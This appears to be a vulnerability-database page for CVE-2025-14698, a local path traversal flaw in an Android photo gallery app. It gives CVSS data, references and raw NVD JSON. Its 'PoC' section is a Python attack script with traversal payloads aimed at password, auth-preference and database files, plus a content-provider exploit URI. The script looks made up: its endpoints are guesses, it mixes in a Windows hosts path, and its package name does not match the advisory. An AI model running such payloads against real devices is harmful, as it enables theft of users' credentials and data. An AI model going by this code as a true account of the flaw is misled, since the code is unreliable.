CVE-2025-14698

Description

A weakness has been identified in atlaszz AI Photo Team Galleryit App 1.3.8.2 on Android. This affects an unknown part of the component gallery.photogallery.pictures.vault.album. This manipulation causes path traversal. The attack needs to be launched locally. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

atlaszz AI Photo Team Galleryit App < 1.3.8.2 (Android)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14698 Path Traversal PoC for atlaszz AI Photo Team Galleryit App
# Tested on Android with app version 1.3.8.2

import requests
import urllib.parse

def exploit_path_traversal(target_ip, target_port=80):
    """
    Exploit for CVE-2025-14698: Path Traversal in atlaszz AI Photo Team Galleryit App
    Component: gallery.photogallery.pictures.vault.album
    """
    
    # Target endpoint for gallery photo access
    base_url = f"http://{target_ip}:{target_port}"
    
    # Path traversal payloads to read sensitive files
    payloads = [
        "../../../etc/passwd",
        "../../../system/app/permissions.xml",
        "../../data/data/com.atlaszz.galleryit/shared_prefs/auth.xml",
        "../../../data/data/com.atlaszz.galleryit/databases/photos.db",
        "../../../sdcard/DCIM/../..//data/data/com.atlaszz.galleryit/files/",
        "..\..\..\windows\system32\drivers\etc\hosts"
    ]
    
    for payload in payloads:
        # Try to access files through path traversal
        encoded_payload = urllib.parse.quote(payload)
        
        # Method 1: Direct file access endpoint
        url = f"{base_url}/gallery/photogallery/pictures/vault/album?path={encoded_payload}"
        try:
            response = requests.get(url, timeout=5)
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[+] SUCCESS: Extracted file with payload: {payload}")
                print(f"Content preview: {response.text[:200]}...")
        except requests.RequestException as e:
            print(f"[-] Request failed for payload {payload}: {e}")
        
        # Method 2: Alternative endpoint format
        url2 = f"{base_url}/api/v1/album/read?file={encoded_payload}"
        try:
            response2 = requests.post(url2, timeout=5)
            if response2.status_code == 200:
                print(f"[+] SUCCESS via POST: {payload}")
        except:
            pass
    
    print("\n[*] Note: This PoC requires local access to the Android device")
    print("[*] For Android exploitation, use ADB or install a companion app")

# Android-specific exploitation via content provider
def android_content_provider_exploit():
    """
    Exploitation via Android Content Provider if exposed
    """
    content_uri = "content://com.atlaszz.galleryit.provider/album"
    
    # Malicious path to traverse
    malicious_path = "../../data/data/com.atlaszz.galleryit/shared_prefs/"
    
    # Construct the exploit query
    exploit_uri = f"{content_uri}?path={malicious_path}"
    
    print(f"[*] Android Content Provider Exploit URI: {exploit_uri}")
    print("[*] Execute via: content query --uri <exploit_uri>\n")

if __name__ == "__main__":
    print("CVE-2025-14698 Path Traversal Exploitation")
    print("Target: atlaszz AI Photo Team Galleryit App 1.3.8.2")
    print("=" * 50)
    
    # For remote targets (if app exposes network interface)
    # exploit_path_traversal("192.168.1.100", 8080)
    
    # Android-specific exploitation
    android_content_provider_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14698
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14698
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14698/
[4] VulDB https://vuldb.com/cve/CVE-2025-14698
[5] https://github.com/Secsys-FDU/AF_CVEs/issues/2
[6] https://vuldb.com/?ctiid.336416
[7] https://vuldb.com/?id.336416
[8] https://vuldb.com/?submit.706213

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14698", "sourceIdentifier": "[email protected]", "published": "2025-12-15T03:15:44.870", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in atlaszz AI Photo Team Galleryit App 1.3.8.2 on Android. This affects an unknown part of the component gallery.photogallery.pictures.vault.album. This manipulation causes path traversal. The attack needs to be launched locally. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:P/A:P", "baseScore": 3.2, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/2", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.336416", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.336416", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.706213", "source": "[email protected]"}]}}